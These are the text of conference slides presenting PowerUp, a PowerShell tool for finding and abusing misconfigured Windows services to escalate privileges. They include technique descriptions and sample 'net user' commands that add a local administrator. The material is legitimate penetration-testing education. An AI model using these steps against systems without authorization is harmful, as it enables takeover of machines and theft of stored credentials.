Automating Windows Privilege Escalation

Will@harmj0y

Veris GroupAdaptive Threat Division

$ whoami

Security researcher and pentester/red teamer for the Adaptive Threat Division of Veris Group

Co-founder of the Veil-Framework #avlol www.veil-framework.com Shmoocon ‘14: AV Evasion with the Veil Framework co-wrote Veil-Evasion, wrote Veil-Catapult and Veil-

PowerView

BSides Austin ‘14: Wielding a Cortana

BSides Boston ’14: Pwnstaller 1.0

Defcon ’14 (accepted): Post-Exploitation 2.0

tl;dr

Why powershell?

Why build this?

Windows Service Vulnerabilities

PowerUp service enumeration service abuse misc. methods

Demo

Questions

Why Powershell?

Really need to say anything?

Whitelisted, trusted execution, full .NET capabilities, can refrain from touching disk, etc. etc. etc.

Use it, yo’ PowerSploit Posh-SecMod Veil-Powerview Nishang

Why build this?

On a recent assessment, had to escalate privileges on a locked down workstation

Kernel exploits wouldn’t work, so fell back to vulnerable services Service binary had improper permissions Replacing the .exe and bouncing the box = no

privs to local admin

More or less did everything manually, wanted something a bit easier

Windows Service Vulnerabilities

Trusted Path Escalation

Metasploit module: trusted_service_path.rb

If a path is unquoted and has a space, there is ambiguity for the Windows API on how to interpret the final path

I.E. C:\Tools\Custom Tools\program.exe will be interpreted as C:\Tools\Custom.exe first, then C:\Tools\Custom Tools\program.exe

If you have write access to the base path, money!

Vulnerable Service Permissions

Also a Metasploit module: service_permissions.rb

Check if the current user can modify the service itself

Replace the binary path for the service with something like “net user john password /add” and bounce the service to add the user

Repeat with “net localgroup administrators john /add”

Can be done by hand with accesschk.exe and SC

Vulnerable EXE Permissions

Check the permissions for each executable associated with running processes

If you can write to the executable path for a service, replace the binary with something that adds a local admin (or pops a Meterpreter shell)

If you can’t bounce the service, bounce the box

This is how we ended up escalating in the field

Escalation Automation With Powershell

PowerUp

Implements methods to easily enumerate and abuse misconfigured Windows services for the purposes of privilege escalation

Have started to implement additional common Windows privesc vectors .dll hijacking, AlwaysInstallElevated, etc.

http://www.harmj0y.net/blog/powershell/powerup/

https://github.com/HarmJ0y/PowerUp

Service Enumeration

Get-ServiceUnquoted will find all services with unquoted paths and a space in the full path name

Get-ServicePerms enumerates all services the current user has modification rights to

Get-ServiceEXEPerms checks all associated service executables and returns any paths the user has write access to

Service Abuse

Invoke-ServiceUserAdd enables/stops a service, reconfigures it to create a user and add them to the local admins, restarts, etc.

Write-UserAddServiceBinary generates a precompiled C# service binary and binary patches in the service name, username/password and group to add a user to Can easily write the binary out to any

unquoted paths

Write-ServiceEXE writes a service binary out to a given service path, backing up the original .exe

Misc. Checks I

Invoke-FindDLLHijack is a (kind of) port of Mandiant’s FindDLLHijack code Checks each running process and its loaded

modules, and returns all hijackable locations, i.e. any base “exe path + loaded module name” that doesn’t exist

Invoke-FindPathDLLHijack finds potentially hijackable service .DLL locations from %PATH% Check out

http://www.greyhathacker.net/?p=738 for more information

Misc. Checks II

Get-RegAlwaysInstallElevated checks if the AlwaysInstallElevated registry key is enabled Write-UserAddMSI can then write out a MSI

installer that prompts for a local admin to add

Get-UnattendedInstallFiles finds unattended .xml install files that may have leftover credentials

Get-RegAutoLogon extracts any auto logon credentials from the Windows registry

Invoke-AllChecks will run all current privesc checks

Demo

Questions?

Contact me: @harmj0y will@harmj0y.net

Read more: http://www.harmj0y.net/blog/powershell/power

up/

Get PowerUp https://github.com/HarmJ0y/PowerUp Being integrated into Nishang